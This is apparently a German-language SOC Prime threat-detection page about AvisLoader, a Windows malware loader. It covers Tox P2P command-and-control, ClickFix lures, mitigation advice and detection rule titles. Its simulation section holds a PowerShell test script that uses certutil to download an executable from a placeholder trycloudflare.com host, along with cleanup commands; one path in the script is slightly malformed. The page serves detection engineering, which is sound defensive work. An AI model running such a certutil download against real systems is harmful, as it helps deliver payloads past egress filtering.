SOC Prime Bias: High

25 Sep 2026 08:27 UTC

AvisLoader taucht als robuster Malware-Loader für Windows auf

Author Photo
SOC Prime Team linkedin icon Folgen
AvisLoader taucht als robuster Malware-Loader für Windows auf
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

AvisLoader ist ein neu identifizierter Windows-Malware-Loader, der das Tox-Peer-to-Peer (P2P)-Messaging-Netzwerk für die Command-and-Control (C2)-Kommunikation verwendet. Dieser dezentrale Ansatz ermöglicht es den Betreibern, die Konnektivität aufrechtzuerhalten und Controller zu verlagern, ohne auf feste Domains oder zentrale Server angewiesen zu sein. Die Malware wird häufig durch ClickFix-Social-Engineering-Lockmittel verteilt, die auf der Cloudflare-Infrastruktur gehostet werden.

Untersuchung

Das Varonis Threat Labs entdeckte den Loader auf einem offenen Staging-Server zusammen mit seinem Befehlszentrum und zugehörigen Tools. Die Untersuchung identifizierte ein DocuSign-gestaltetes ClickFix-Lockmittel, das Benutzer anweist, Befehle auszuführen, die Nutzdaten über Cloudflare Quick Tunnels abrufen. Die Analyse der ausführbaren Datei ergab Tox-basierte C2-Kommunikation, UAC-Bypass-Funktionalität und Module, die darauf ausgelegt sind, bösartige Prozesse zu verbergen.

Minderung

Organisationen sollten Benutzer schulen, Dokumenten-Signaturen zu erkennen und zu melden, die sie auffordern, Befehle in Terminals oder den Windows-Ausführen-Dialog einzugeben. Sicherheitsteams sollten die verdächtige Nutzung von Cloudflare Workers und Quick Tunnels in webbasierten Lockmitteln überwachen. Die Erkennung unerwarteten Peer-to-Peer (P2P)-Netzwerkverkehrs und unautorisierter Änderungen an Desktop-Verknüpfungen kann ebenfalls dazu beitragen, das Risiko zu verringern.

Antwort

Wenn Aktivitäten von AvisLoader erkannt werden, sollten Sicherheitsteams die Prozessherkunft von nach Besuchen auf verdächtigen Domains gestarteten Befehlszeilen und Skript-Interpretern überprüfen. Endpunkte auf modifizierte Verknüpfungen untersuchen, .backup Dateien, und das VLCAssistant Artefakt. Auch die Netzwerktelemetrie sollte auf ungewöhnlichen Tox-Protokollverkehr überprüft werden, der von betroffenen Hosts ausgeht.

Angriffsablauf

Wir aktualisieren diesen Teil noch.

Erkennungen

Verdächtige ausführbare Datei mit nur Zahlen im Namen (über cmdline)

SOC Prime Team
24 Sep 2026

Verdächtige Trycloudflare-Domänenkommunikation (über dns)

SOC Prime Team
24 Sep 2026

Verdächtiger Curl-Ausführungsversuch [MacOS] (über cmdline)

SOC Prime Team
24 Sep 2026

IOCs (HashSha256) zur Erkennung: Meet AvisLoader: Ein Windows-Loader, der einen Takedown überdauern soll

SOC Prime KI-Regeln
24 Sep 2026

Unerwarteten Tox- oder Peer-to-Peer-Verkehr erkennen [Windows Netzwerkverbindung]

SOC Prime KI-Regeln
24 Sep 2026

Erkennung von Remote-Code-Ausführung über Befehlszeilen und Cloudflare Quick Tunnel [Windows Prozess-Erstellung]

SOC Prime KI-Regeln
24 Sep 2026

Simulation-Ausführung

  • Angriffserzählung & Befehle: Ein Angreifer hat sich initialen Zugang zu einem Arbeitsrechner verschafft. Um Persistenz aufrechtzuerhalten und seine sekundäre modulare Nutzlast herunterzuladen, nutzt er einen Cloudflare Quick Tunnel, um Egress-Filtering zu umgehen. Der Angreifer verwendet certutil.exe, ein integriertes Windows-Dienstprogramm, um die Nutzlast von https://malicious-tunnel-id.trycloudflare.com/payload.exeherunterzuladen. Diese Methode wird gewählt, weil certutil eine vertrauenswürdige binäre Datei ist und der Datenverkehr scheinbar zu einer legitimen Cloudflare-Infrastruktur führt, wodurch es weniger wahrscheinlich ist, dass er von grundlegenden Netzwerk-Reputationsfiltern markiert wird.

  • Regression-Testskript:

    # Simulationsskript zur Auslösung der Erkennungsregel.
    # Dieses verwendet certutil, um einen Download von einer trycloudflare.com-Adresse zu versuchen.
    
    $targetUrl = "https://fake-tunnel-id-1234.trycloudflare.com/malware.exe"
    Write-Host "[*] Adversary-Aktivität simulieren: Herunterladen von $targetUrl über certutil..."
    
    # Der folgende Befehl soll die Bedingungen 'selection_tunnel' UND 'selection_tools' auslösen.
    certutil.exe -urlcache -split -f "$targetUrl" "$env:TEMPmalware.exe"
    
    if ($LASTEXITCODE -eq 0) {
        Write-Host "[+] Simulationsbefehl erfolgreich ausgeführt."
    } else {
        Write-Host "[-] Befehl fehlgeschlagen (Erwartet, wenn die URL nicht vorhanden ist, aber Telemetrie sollte trotzdem generiert werden)."
    }
  • Bereinigungskommandos:

    # Bereinigungsskript, um die simulierte Nutzlast und lokale Artefakte zu entfernen.
    $tempFile = "$env:TEMPmalware.exe"
    if (Test-Path $tempFile) {
        Remove-Item -Path $tempFile -Force
        Write-Host "[+] $tempFile bereinigt"
    } else {
        Write-Host "[-] Kein zu bereinigendes Artefakt gefunden."
    }